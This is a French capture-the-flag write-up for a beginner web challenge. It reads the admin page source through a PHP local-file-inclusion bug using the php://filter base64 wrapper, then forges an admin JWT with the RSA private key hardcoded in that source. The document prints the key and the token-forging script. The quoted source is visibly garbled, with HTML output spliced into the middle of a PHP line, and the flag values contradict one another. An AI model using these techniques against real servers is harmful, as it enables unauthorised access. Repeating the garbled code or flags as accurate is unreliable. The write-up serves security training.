# Introduction au casino des aviateurs

## Consignes :

Le casino des aviateurs est un casino très connu néanmoins il dissimule un flag achetable.
Cette introduction consiste à pouvoir vous connecter à la partie administration du casino.
Vous trouverez alors le flag de cette introduction.


## Points attribués :

```
20 Points 
```

## Flag :
```
Fl@g{secure_your_JWT_deployement}
```

## Déroulé :

Le site disponible présente une page d'accueil avec plusieurs onglets différents tels que "contact", "about", "accueil", "administration".

![page accueil](assets/images/index.png)

On peut de suite remarquer l'utilisation de la fonction php "include" en se baladant dans les pages et en regardant l'url.

![détection fonction php include](assets/images/include.png)

Grâce à l'inclusion des pages, si l'input n'est pas vérifiée, il est possible lire des fichiers de manière arbitraire sur le serveur web.

Ici, il n'est possible d'inclure que les fichiers locaux. Cependant, les fichiers sont des fichiers php et sont interprétés par le serveur.

Pour éviter cela, il est possible d'encoder le fichier en base64 afin de récupérer la sortie et pouvoir la décoder à domicile.

L'intêret ici est de récupérer la page admin.php car nous devons nous connecter pour obtenir le flag.
Cela est possible avec la technique du wrapper php filter comme suit :

![test wrapper filter](assets/images/wrapper.png)

Cela fonctionne et l'on peut récupérer la sortie en base64 afin de la décoder sur notre machine comme suit.
Nous obtenons le code source suivant :

```
<div class="container">
	<div class="row">
		<div class="col-lg-8 mx-auto">
			<center><h2>Administration</h2></center>
		</div>
	</div>
</div>
<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;

header("Access-Control-Allow-Origin: *");
// header("Content-Type: application/json; charset=UTF-8");
header("Access-Control-Allow-Methods: POST");
header("Access-Control-Max-Age: 3600");
header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With");

/** 
 * Get header Authorization
 * */
function getAuthorizationHeader(){
        $headers = null;
        if (isset($_SERVER['Authorization'])) {
            $headers = trim($_SERVER["Authorization"]);
        }
        else if (isset($_SERVER['HTTP_AUTHORIZATION'])) { //Nginx or fast CGI
            $headers = trim($_SERVER["HTTP_AUTHORIZATION"]);
        } elseif (function_exists('apache_request_headers')) {
            $requestHeaders = apache_request_headers();
            // Server-side fix for bug in old Android versions (a nice side-effect of this fix means we don't care about capitalization for Authorization)
            $requestHeaders = array_combine(array_map('ucwords', arra>Le flag est le suivant :Mars{secure_your_JWT_deployement} </h3>	
		</section><br>
	</body>
	<!-- Footer -->
y_keys($requestHeaders)), array_values($requestHeaders));
            //print_r($requestHeaders);
            if (isset($requestHeaders['Authorization'])) {
                $headers = trim($requestHeaders['Authorization']);
            }
        }
        return $headers;
    }
/**
 * get access token from header
 * */
function getBearerToken() {
    $headers = getAuthorizationHeader();
    // HEADER: Get the access token from the header
    if (!empty($headers)) {
        if (preg_match('/Bearer\s(\S+)/', $headers, $matches)) {
            return $matches[1];
        }
    }
    return null;
}

$jwt = null;

$privateKey = <<<EOD
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQC8kGa1pSjbSYZVebtTRBLxBz5H4i2p/llLCrEeQhta5kaQu/Rn
vuER4W8oDH3+3iuIYW4VQAzyqFpwuzjkDI+17t5t0tyazyZ8JXw+KgXTxldMPEL9
5+qVhgXvwtihXC1c5oGbRlEDvDF6Sa53rcFVsYJ4ehde/zUxo6UvS7UrBQIDAQAB
AoGAb/MXV46XxCFRxNuB8LyAtmLDgi/xRnTAlMHjSACddwkyKem8//8eZtw9fzxz
bWZ/1/doQOuHBGYZU8aDzzj59FZ78dyzNFoF91hbvZKkg+6wGyd/LrGVEB+Xre0J
Nil0GReM2AHDNZUYRv+HYJPIOrB0CRczLQsgFJ8K6aAD6F0CQQDzbpjYdx10qgK1
cP59UHiHjPZYC0loEsk7s+hUmT3QHerAQJMZWC11Qrn2N+ybwwNblDKv+s5qgMQ5
5tNoQ9IfAkEAxkyffU6ythpg/H0Ixe1I2rd0GbF05biIzO/i77Det3n4YsJVlDck
ZkcvY3SK2iRIL4c9yY6hlIhs+K9wXTtGWwJBAO9Dskl48mO7woPR9uD22jDpNSwe
k90OMepTjzSvlhjbfuPN1IdhqvSJTDychRwn1kIJ7LQZgQ8fVz9OCFZ/6qMCQGOb
qaGwHmUK6xzpUbbacnYrIM6nLSkXgOAwv7XXCojvY614ILTK3iXiLBOxPu5Eu13k
eUz9sHyD6vkgZzjtxXECQAkp4Xerf5TGfQXGXhxIX52yH+N2LtujCdkQZjXAsGdm
B2zNzvrlgRmgBrklMTrMYgm1NPcW+bRLGcwgW2PTvNM=
-----END RSA PRIVATE KEY-----
EOD;

$publicKey = <<<EOD
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8kGa1pSjbSYZVebtTRBLxBz5H
4i2p/llLCrEeQhta5kaQu/RnvuER4W8oDH3+3iuIYW4VQAzyqFpwuzjkDI+17t5t
0tyazyZ8JXw+KgXTxldMPEL95+qVhgXvwtihXC1c5oGbRlEDvDF6Sa53rcFVsYJ4
ehde/zUxo6UvS7UrBQIDAQAB
-----END PUBLIC KEY-----
EOD;

$payload = array(
    "user" => "admin",
);

$data = json_decode(file_get_contents("php://input"));

$jwt = getBearerToken();

$bdd = new PDO('mysql:host=localhost;dbname=chall', 'root', '');
$reqflag = $bdd->prepare("SELECT content FROM articles WHERE id=0");
$reqflag->execute();
$strflag = $reqflag->fetch();

if($jwt != NULL){

    try {

        $decoded = JWT::decode($jwt, $publicKey, array('RS256'));
        $flag = "<h3>Le flag est le suivant :" . $strflag[0] ." </h3>";
        echo $flag;

    }catch (Exception $e){

    http_response_code(401);

    echo json_encode(array(
        "message" => "Access denied.",
        "error" => $e->getMessage()
    ));
}

}
else
	echo "<br><center><h3>Authentification Denied</center></h3><br>";
    echo "<center><h3>you need to use jwt via post and Authorization Bearer</h3></center>";
?>
```

Après analyse du code source, il faut se connecter via un jeton JWT pour afficher le flag.
La clef privée RSA est hardcodée dans la page, par conséquent, on rédige le code suivant avec la clef privée afin de générer un jeton JWT valide.
Il est necessaire d'installer composer ```curl -sS https://getcomposer.org/installer | php;sudo mv composer.phar /usr/local/bin/composer``` ainsi que le plugin ```composer require firebase/php-jwt```. 

```
<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;

$payload = array(
    "user" => "admin",
);

$privateKey = <<<EOD
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQC8kGa1pSjbSYZVebtTRBLxBz5H4i2p/llLCrEeQhta5kaQu/Rn
vuER4W8oDH3+3iuIYW4VQAzyqFpwuzjkDI+17t5t0tyazyZ8JXw+KgXTxldMPEL9
5+qVhgXvwtihXC1c5oGbRlEDvDF6Sa53rcFVsYJ4ehde/zUxo6UvS7UrBQIDAQAB
AoGAb/MXV46XxCFRxNuB8LyAtmLDgi/xRnTAlMHjSACddwkyKem8//8eZtw9fzxz
bWZ/1/doQOuHBGYZU8aDzzj59FZ78dyzNFoF91hbvZKkg+6wGyd/LrGVEB+Xre0J
Nil0GReM2AHDNZUYRv+HYJPIOrB0CRczLQsgFJ8K6aAD6F0CQQDzbpjYdx10qgK1
cP59UHiHjPZYC0loEsk7s+hUmT3QHerAQJMZWC11Qrn2N+ybwwNblDKv+s5qgMQ5
5tNoQ9IfAkEAxkyffU6ythpg/H0Ixe1I2rd0GbF05biIzO/i77Det3n4YsJVlDck
ZkcvY3SK2iRIL4c9yY6hlIhs+K9wXTtGWwJBAO9Dskl48mO7woPR9uD22jDpNSwe
k90OMepTjzSvlhjbfuPN1IdhqvSJTDychRwn1kIJ7LQZgQ8fVz9OCFZ/6qMCQGOb
qaGwHmUK6xzpUbbacnYrIM6nLSkXgOAwv7XXCojvY614ILTK3iXiLBOxPu5Eu13k
eUz9sHyD6vkgZzjtxXECQAkp4Xerf5TGfQXGXhxIX52yH+N2LtujCdkQZjXAsGdm
B2zNzvrlgRmgBrklMTrMYgm1NPcW+bRLGcwgW2PTvNM=
-----END RSA PRIVATE KEY-----
EOD;

$jwt = JWT::encode($payload, $privateKey, 'RS256');
echo "result:\n" . print_r($jwt, true) . "\n";
```

![création jwt](assets/images/jwt.png)

On peut enfin envoyer notre jeton JWT afin de récupérer le flag.

![curl jwt](assets/images/curl.png)

Cela nous permet d'obtenir le flag suivant : ```Fl@g{secure_you_JWT_deployement}```